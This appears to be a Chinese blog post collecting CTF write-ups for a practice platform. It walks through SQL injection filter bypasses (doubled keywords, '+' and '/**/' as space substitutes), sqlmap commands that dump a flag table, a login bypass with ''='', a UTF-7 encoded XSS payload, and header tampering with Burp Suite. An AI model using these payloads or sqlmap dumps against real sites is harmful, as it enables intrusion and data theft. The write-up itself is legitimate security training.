关于SQL注入的WriteUp-小叶博客简单的sql注入1:
实验网址:http://ctf5.shiyanbar.com/423/web/
根据标题暗示、在输入框中输入1、
发现网址变成了http://ctf5.shiyanbar.com/423/web/?id=1
接着使用单引号报错法、在网址后面加个单引号、
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
发现报错了、那么说明存在注入点、然后使用联合查询语句:
union select flag from flag where'1'='1
至于表名和字段名是猜出来的哈、慢慢猜、脑力活、我这里猜都是flag、
根据报错提示可以看到关键词都被过滤了、那么尝试最简单的双重关键词、
unionunion selectselect flag fromfrom flag wherewhere'1'='1
还是报错了、通过报错信息发现空格被过滤了、
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselectflag fromflag wherewhere'1'='1'' at line 1
那么我们尝试使用+号连接、那么查询语句就变成了:
+unionunion+selectselect+flag+fromfrom+flag+wherewhere+'1'='1
然后就成功查询到了想要的flag:
ID: 1' union select flag from flag where'1'='1
name: baloteliID: 1' union select flag from flag where'1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}
简单的sql注入2:
实验网址:http://ctf5.shiyanbar.com/web/index_2.php
步骤和上题差不多、当尝试联合查询时、系统提示SQLi detected!
说明语句中有东西被过滤了、而且报错被屏蔽了、那么这里就出现了一个新概念、盲注、
经过尝试发现union等关键词都没用被过滤、说明问题出在空格这里、
老方法不行了那么尝试注释绕过、就是将空格都替换成注释/**/、
/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
得到我们想要的flag:
ID: 2'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
name: kanawaluoID: 2'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}
简单的sql注入3:
实验网址:http://ctf5.shiyanbar.com/web/index_3.php
这一次的注入难度又升级了、要么回复Hello要么回复空显、
我们用分号报错法、是的又是分号报错、系统提示的报错以及文件路径:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\A1bnH3a\ctf\web\index_3.php on line 30You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1?
这个就有意思了、看到路径一般的思路都是sqlmap跑一跑、特别是这个明显有注入点的站、废话不多说、开跑了、
首先跑出数据库来:sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs
然后发现它一共有2个数据库、
available databases [2]:
information_schema
web1
不知道flag在哪个库那么我们直接来跑表:sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables
然后能看到web1数据库中有我们想要的表、
另外一张表数据有些多我就不贴出来了、
Database: web1[2 tables]
+---------------------------------------+
| flag |
| web_1 |
+---------------------------------------+
那么直接跑我们想要的表flag:sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 -D web1 -T flag -C flag --dump
就能直接得到flag了、
Database: web1Table: flag[1 entry]
+----------------------------+
| flag |
+----------------------------+
| flag{Y0u_@r3_5O_dAmn_90Od} |
+----------------------------+

最近做了好些变态题目、脑子都有点不好使了、都是一些关于web的项目、尝试了一下密码学的题目、一脸懵逼、
我就继续在这里写writeup吧、不开新帖了、浪费资源、
匿名登陆
实验地址:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
题目说已经过滤了所有、那么我们怎么注入呢、
正常的sql语句是这样的:

Select * form user where username=’$_POST’;

$_POST就是我们登陆时输入的内容、那么我们注入的思路就是:
Select * form user where username=’1’=’1’;
然后发现系统报错、说明过滤了某些元素、1等于1过不了那就尝试一下空等于空、
Select * form user where username=’’=’’;
然后就得到了我们想要的flag以及username和password:

ctf{51d1bf8fb65a8c2406513ee8f52283e7}
hint:
username:'='
password:'='
username password
hell02w 69bc7cf459bcff03625939193ec71e0e
w0d3rkun dbb9111e4ed03e2d4021c3c3b0ac8749
mut0r3nl 86846490336911c0f3c6e07cc197d22c

跨站XSS
实验地址:http://ctf5.shiyanbar.com/basic/xss/
这是题目内容:
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413
看到这一长串唯一的想法就是解码、题目给的提示是XSS、
那么就用XSS在线解码来完成:
http://web2hack.org/xssee/
具体使用方法是先用Unescape解码一次、得到
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=+/v+ +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-&_=1302746925413
然后复制红色部分使用UTF7 Decode解码得到KEY、
+/v+ <script>alert("key:/%nsfocusXSStest%/")</script>-&_
再把KEY输入即可得到flag:
<%cmd = request.form("solution")if (cmd = "/%nsfocusXSStest%/") thenresponse.write("<script>alert('恭喜你答对了!过关KEY:%nsfocusXSStest%')</script>")else response.write("<script>alert('不正确啊,再努力吧~!')</script>")end if %>
Catch1
实验地址:http://ctf5.shiyanbar.com/basic/catch/
首先我们使用火狐浏览器配合burpsuite进行抓包、
然后go发现:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:48:02 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalIDAte, post-check=0, pre-check=0
Pragma: no-cache
Content-Row: MTQ5MTkwMzY4OA==
Content-Length: 14
Connection: close
Content-Type: text/html
Check Failed!

提取出MTQ5MTkwMzY4OA==输入、得到KEY:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:48:40 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Row: MTQ5MTkwMzY4OA==
Content-Length: 21
Connection: close
Content-Type: text/html
KEY: #WWWnsf0cus_NET#

另外一个思路是直接使用浏览器自带的审查元素功能、
F12之后输入任意key点击网络查看响应头、得到的结果是一样的、
Catch2
实验地址:http://ctf5.shiyanbar.com/basic/header/
根据报错提示说明要改响应头:
ForbiddenYou don't have permission to access / on this server.Make sure you are in HongKong
还是一样的工具、抓到数据之后把 zh-CN改为 zh-HK即可:

GET /basic/header/ HTTP/1.1
Host: ctf5.shiyanbar.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b9d3507a70c7abcd16f7165234e06374
Connection: close
Upgrade-Insecure-Requests: 1

 

改过之后得到KEY:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:59:25 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 288
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>403 Forbidden</title> 
</head><body> 
<h1>Forbidden</h1> 
<p>You don't have permission to access /
on this server.</p> 
</body>
</html>
<br><br>KEY:123JustUserAGent<br><br>